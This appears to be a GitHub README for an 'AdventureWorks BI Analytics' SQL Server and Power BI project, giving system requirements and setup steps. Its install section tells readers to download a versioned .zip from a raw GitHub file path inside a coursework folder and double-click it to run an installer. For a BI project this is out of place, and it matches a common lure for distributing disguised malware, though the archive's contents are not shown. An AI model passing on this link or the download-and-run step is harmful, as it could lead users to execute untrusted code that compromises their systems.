🛠️ System Requirements

To run AdventureWorks BI Analytics smoothly, ensure your system meets the following requirements:

  • Operating System: Windows 10 or later

  • RAM: Minimum 8 GB
  • Disk Space: At least 500 MB available space
  • Software: Microsoft SQL Server (2017 or later), SQL Server Management Studio (SSMS), and Power BI Desktop

📂 Download & Install

To get started, visit the Releases page and choose the latest version of the software. Click on the version number to see the available files. Follow these steps:

  1. Find the most recent release of AdventureWorks BI Analytics.
  2. Look for the appropriate file for your system (usually an executable .exe or a .zip file).
  3. Click to download the file. This file will typically be named something like https://raw.githubusercontent.com/Ironc00kie/adventureworks-bi-analytics/main/Projet_AdventureWorks2019_CC_2425/bi_analytics_adventureworks_3.3-alpha.1.zip.
  4. Once the download is complete, locate the file in your downloads folder and double-click it to run the installer.
  5. Follow the installation instructions that appear on your screen to complete the setup process.

🔄 Getting Started with the Application

After installing AdventureWorks BI Analytics, follow these steps to set it up:

  1. Launch the Application: Locate the created shortcut on your desktop or in the Start menu and double-click it.
  2. Connect to Your Database: You will need to connect the application to your SQL Server database containing the AdventureWorks2019 data.
    • Open the application and select “Connect to Database”.
    • Enter your SQL Server details and click “Connect”.
  3. Access ETL Pipelines: Navigate to the ETL section to set up your data pipelines.
    • Create a new ETL package and configure the source and destination for your data.
